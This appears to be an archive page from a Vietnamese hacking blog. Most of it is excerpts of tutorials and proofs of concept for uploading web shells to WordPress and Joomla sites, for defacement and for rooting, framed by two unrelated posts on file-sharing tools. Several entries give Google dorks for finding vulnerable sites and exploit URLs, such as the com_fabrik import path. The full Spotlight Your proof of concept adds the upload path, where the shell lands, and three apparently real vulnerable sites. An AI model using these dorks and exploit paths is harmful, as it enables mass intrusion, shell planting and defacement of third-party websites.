Tổng hợp các công cụ Upload và chia sẻ dữ liệu ngay trên Desktop

Bài viết này sẽ tổng hợp một số các ứng dụng giúp upload và chia sẻ dữ liệu ngay trên màn hình Desktop.

Ngày nay, người dùng có thể dễ dàng kết nối vào thế giới Internet thông qua các hình thức kết nối khác nhau như ADSL, Wifi, D-Com 3G,.. vì thế môi trường làm việc của chúng ta luôn luôn trực tuyến và sẳn sàng cho nhu cầu làm việc Online ngay trên màn hình Desktop của máy tính mà không cần thiết phải mở trình duyệt và truy cập vào các dịch vụ web.
READ MORE »

SHELL UPLOAD + BACK CONNECT + ROOTING + MASS DEFACE

HERE WE GO FINALLY MY MASTER TUT ON SHELL UPLOAD+BACK CONNECT+ROOTING+ MASS DEFACE ALL IN ONE VIDEO.. :)
READ MORE »

WORDPRESS SHELL UPLOAD BYPASS

METHOD GIVEN BY MY DEAR FRIEND MAURITANIA ATTACKER TO BYPASS SHELL UPLOAD IN WORDPRESS

LET'S START
READ MORE »

SQLi vBB + Upload Shell via phpMyAdmin + Remote Desktop

SQL Injection  vBB + Upload Shell via phpMyAdmin + Remote Desktop

Download Tutorial:
Click here to download!

Password: junookyo

Wordpress Plugins Spotlight Upload Vulnerability

Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability

Google Dork: inurl:"/wp-content/plugins/spotlightyour/"

Date: 18/11/2012

Locations: Banjarmasin, Indonesia

Author: ovanIsmycode & walangkaji

Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org

Software Link: http://www.spotlightyour.comREAD MORE »

How I Hacked Facebook Employees Secure Files Transfer service (http://files.fb.com)

Hi,

I want to share my finding regarding Password Reset logic flaw in Facebook Secure Files Transfer for Employees.

Sometimes when you add a new security measure (Such as Secured File Transfer by Acellion),  You may unintentionally expose your organization to these kind of risks

READ MORE »

Wordpress Themes - yvora Arbitrary File Upload Vulnerability

-------------------------------------------------------------------------------
Wordpress Themes- yvora Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/themes/yvora"
#
#######################################################################################

READ MORE »

Joomla Component com_jsmusic shell upload Vulnerability

#################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"com_jsmusic"
#
##################################################################################
READ MORE »

[TUT] XSS Quà tặng âm nhạc + Upload Shell

Tutorial + TXT đều trong file RAR.

Đây là mod mà nhiều site, 4rum teen hiện đang sài.

Download:

http://www.mediafire.com/?m1137x1z7p31et2

Pass: junookyo

SSI (server side include) injection, shell and deface Page uploading tutorial

SSI (server side include) is a web application exploit, you can put your codes remotly to vulenrable websites,
Server-side Include allowed you to upload files in multi extentions, but in .php extention you can't excute your shell, you have to rename shell.txt to shell.php
Lets Begin...

READ MORE »

"Testing Image collection" shell and files upload vulnrablity

Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
           intitle:"Testing Image Collections"

Goto Google or Bing and Type Dork  inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections"
now see search results in google or bing search ..
select any site from search results and look for upload option
READ MORE »

FCKEditor ASP Version 2.6.8 File Upload Protection Bypass

- Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass

- Credit goes to: Mostafa Azizi, Soroush Dalili

- Link:http://sourceforge.net/projects/fckeditor/files/FCKeditor/

- Description:

There is no validation on the extensions when FCKEditor 2.6.8 ASP version is

dealing with the duplicate files. As a result, it is possible to bypass

the protection and upload a file with any extension.

- Reference: http://soroush.secproject.com/blog/2012/11/file-in-the-hole/

- Solution: Please check the provided reference or the vendor website.

READ MORE »

Joomla Shell Upload Vulnerability

requirements:
1.mind
use this google dork to find vulnerable joomla sites ## 
google dork : inurl:index.php?option=com_fabrik

after open the sites replace with this address ##
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1
for example ##
"www.xyz.com/index.php" to "www.xyz.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1"

READ MORE »

Wordpress Plugins Spotlight Your Upload Vulnerability

___________.__             _________                             _________                     
\__    ___/|  |__   ____   \_   ___ \______  ______  _  ________ \_   ___ \______  ______  _  __
|    |   |  |  \_/ __ \  /    \  \|_  __ \/  _ \ \/ \/ /  ___/ /    \  \|_  __ \/ __ \ \/ \/ /
|    |   |   Y  \  ___/  \     \___|  | \(  <_> )     /\___ \  \     \___|  | \|  ___/\     /
|____|   |___|  /\___  >  \______  /__|   \____/ \/\_//____  >  \______  /__|   \___  >\/\_/ 
\/     \/          \/                        \/          \/           \/       
 
INDO-PENDENT HACKER
http://thecrowscrew.org
#################################################################################################
Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability
Google Dork: inurl:"/wp-content/plugins/spotlightyour/"
Date: 18/11/2012
Locations: Banjarmasin, Indonesia
Author: ovanIsmycode & walangkaji
Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org
Software Link: http://www.spotlightyour.com
#################################################################################################
 
[+] POC
 
Exp. Target :
- http://domain.com/wp-content/plugins/spotlightyour/
 
Exploit :
- /monetize/upload/index.php
 
Shell Access :
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php
 
Ending :
- Fraksi Bejoug a.k.a Kalam Saheru
Saparatoss Blank Blank
awkwkwkwk :v
 
http://beautyexo.com/wp-content/plugins/spotlightyour/monetize/upload/
 
http://www.promogotion.com/wp-content/plugins/spotlightyour/monetize/upload/
 
http://shopping.businessminister.com/wp-content/plugins/spotlightyour/monetize/upload/
 
#################################################################################################
 
Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7,
penjamoen, -=[The Crows Crew]=-, Indonesian Hacker
 
thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org
 
########################################[end]####################################################
 
# 1337day.com [2012-11-19]

6 cách nhanh chóng chia sẻ tập tin đến nhiều người

Khi nhắc đến vấn đề chia sẻ các tập tin trên Internet, có lẽ hầu hết mọi người đều sẽ nghĩ đến việc sử dụng dịch vụ lưu trữ đám mây phổ biến nhất hiện nay đó là Dropbox. Mặc dù đây là dịch vụ lưu trữ trực tuyến có nhiều ưu điểm như: miễn phí, tốc độ download/ upload cao, đồng bộ dễ dàng…tuy nhiên nếu trên máy tính của người nhận không cài đặt ứng dụng do Dropbox cung cấp, họ sẽ gặp phải một vài khó khăn nhất định.

READ MORE »